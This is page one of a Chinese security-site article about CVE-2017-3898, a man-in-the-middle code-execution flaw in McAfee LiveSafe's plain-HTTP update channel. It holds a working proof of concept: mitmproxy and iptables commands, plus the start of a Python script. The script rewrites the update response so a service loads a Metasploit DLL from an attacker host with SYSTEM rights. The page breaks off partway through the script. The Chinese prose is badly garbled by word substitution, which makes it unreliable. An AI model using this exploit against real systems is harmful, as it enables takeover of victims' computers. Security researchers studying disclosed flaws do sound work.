欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

麦咖啡McAfee LiveSafe MiTM RCE漏洞(CVE-2017-3898)研究专题

来源:本站整理 作者:佚名 时间:2017-09-19 TAG: 我要投稿

漏洞破绽bug概述
该漏洞破绽bug影响McAfee LiveSafe (MLS) 16.0.3以前的全体版本,存在长途代码履行。此漏洞破绽bug容许入侵攻击者经由过程窜改HTTP后端相应,从而改动与McAfee更新相干的Windows注册表值。
McAfee Security Scan Plus是一个收费的诊断对象,可反省计算机中的防病毒软件、防火墙及Web网安软件,同时还会扫描已运转法式中的威逼。
该漏洞破绽bug由Silent Signal初次发明并传递。今朝已宣布该漏洞破绽bug的补钉,网址为:https://service.mcafee.com/webcenter/portal/cp/home/articleview?articleId=TS102714
漏洞破绽bug概况
入侵攻击者能够在多个McAfee产物中完成长途代码履行。受影响的产物会经由过程明文HTTP通道,从http://COUNTRY.mcafee.com/apps/msc/webupdates/mscconfig.asp检索设置装备摆设数据(其中的“COUNTRY”改动为国度的两字母标识符,比方英国事“uk”、中国事“cn”)。
相应的注释包括XML格局数据,类似于以下内容:
webservice-response response-version="1.0" frequency="168"
verid="1#1316#15#0#2">
update>
reg key="HKLM\SOFTWARE\McAfee\MSC\Settings\InProductTransaction"
name="enable" type="REG_DWORD" value="1" obfuscate="0"/>
update>
webservice-response>
在上述相应中,描写了在“webservice-response/update”门路下应用reg标志停止的注册表改动行动。
这一哀乞降后续的更新会主动触发,初次触发是在软件装置后的特定分钟后(默许环境下为168分钟)。
此更新由McSvHost.exe过程的PlatformServiceFW.dll履行,办法是应用/update参数挪用mcsvrcnt.exe法式。McSvHost.exe过程应用由完成注册表变动的mcsvrcnt.exe承继的体系权限运转。
是以,入侵攻击者能够改动办事器相应,以应用体系(SYSTEM)权限写入特定的注册表。
PoC
咱们能够借助该漏洞破绽bug,作为署理来拦阻和改动明文HTTP哀求及相应。因为该软件对HTTPS办事会停止证书验证,是以,让这些连接不颠末改动就异常紧张。
惯例的HTTP署理形式中,能够经由过程应用--ignore mitmproxy的敕令行参数来完成这一点:

mitmproxy -s mcreggeli_inline.py --ignore '.*'
在通明署理的形式下,不应该供给上述参数:

mitmproxy -s mreggeli_inline.py –T
针对通明署理形式,可应用以下敕令,在基于Debian的Linux刊行版本上设置装备摆设 NAT和端口重定向(此处eth0 是对目的可见的接口,eth1连接到网络):

"text-indent: 0em;">iptables -t nat -A PREROUTING -i eth0 -p tcp \
--dport 80 -j REDIRECT --to 8080
iptables -t nat -A POSTROUTING -o eth1 -j MASQUERADE
sysctl net.ipv4.ip_forward=1/p>
该剧本会在哀求URL中查找“mscconfig.asp”字符串。假如发明XML相应注释被反序列化,则会依据在剧本开首申明的reg变量,增加新的reg节点。REG变量是一个字典列表,每一个字典都包括以下键:
密钥:要改动的注册表项的称号 (比方“HKLM\SYSTEM\CurrentControlSet\Services\mfevtp”,其中的反斜线需停止Python的本义);
范例:必要创立的值的范例(比方字符串的“REG_SZ”);
称号:必要创立的值的称号;
值:必要创立的值。
该漏洞破绽bug应用还会将频率属性变动成1,这样一来,假如必要再次渗入渗出,就能够在更短的时间内(1小时以内)停止。拔出新节点后,将序列化天生的对象,并将其置于原始相应注释的地位。
为了演示,咱们覆盖了受影响的McAfee产物(即mfevtp,McAfee过程验证办事)的一个办事条款——HKLM\SYSTEM\CurrentControlSet\Services\mfevtp,其值被调换为指向带有指向入侵攻击主机的 UNC 门路参数的rundll32.exe。在这里,咱们应用了Metasploit中smb_delivery模块供给的payload test.dll:

REG变量申明以下:

REG=[{"key":"HKLM\\SYSTEM\\CurrentControlSet\\Services\\mfevtp", "type":"REG_SZ","name":"ImagePath", "value":"c:\\windows\\system32\\rundll32.exe \\\\172.16.205.1\\pwn\\test.dll,0"},]
这样一来,在从新启动计算机以后,体系(SYSTEM)级的敕令履行就会被触发,而McAfee软件并无发明该环境的存在。
mcreggeli_inline.py
#!/usr/bin/env python3
#
# HTTP proxy mode:
#  mitmproxy -s mcreggeli_inline.py --ignore '.*'
#
# Transparent proxy mode:
#   mitmproxy -s mcreggeli_inline.py -T --host
# from mitmproxy import ctx, http
from lxml import etree
REG=[{"key":"HKLM\\SYSTEM\\CurrentControlSet\\Services\\mfevtp","type":"REG_SZ","name":"ImagePath","value":"c:\\windows\\system32\\rundll32.exe \\\\172.16.205.1\\pwn\\test.dll,0"},]
  def response(flow):
        if flow.request.scheme == "http" and "mscconfig.asp" in flow.request.url:
            try:
                oxml=etree.XML(flow.response.content)
                oxml.set("frequency","1")

[1] [2]  下一页

【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载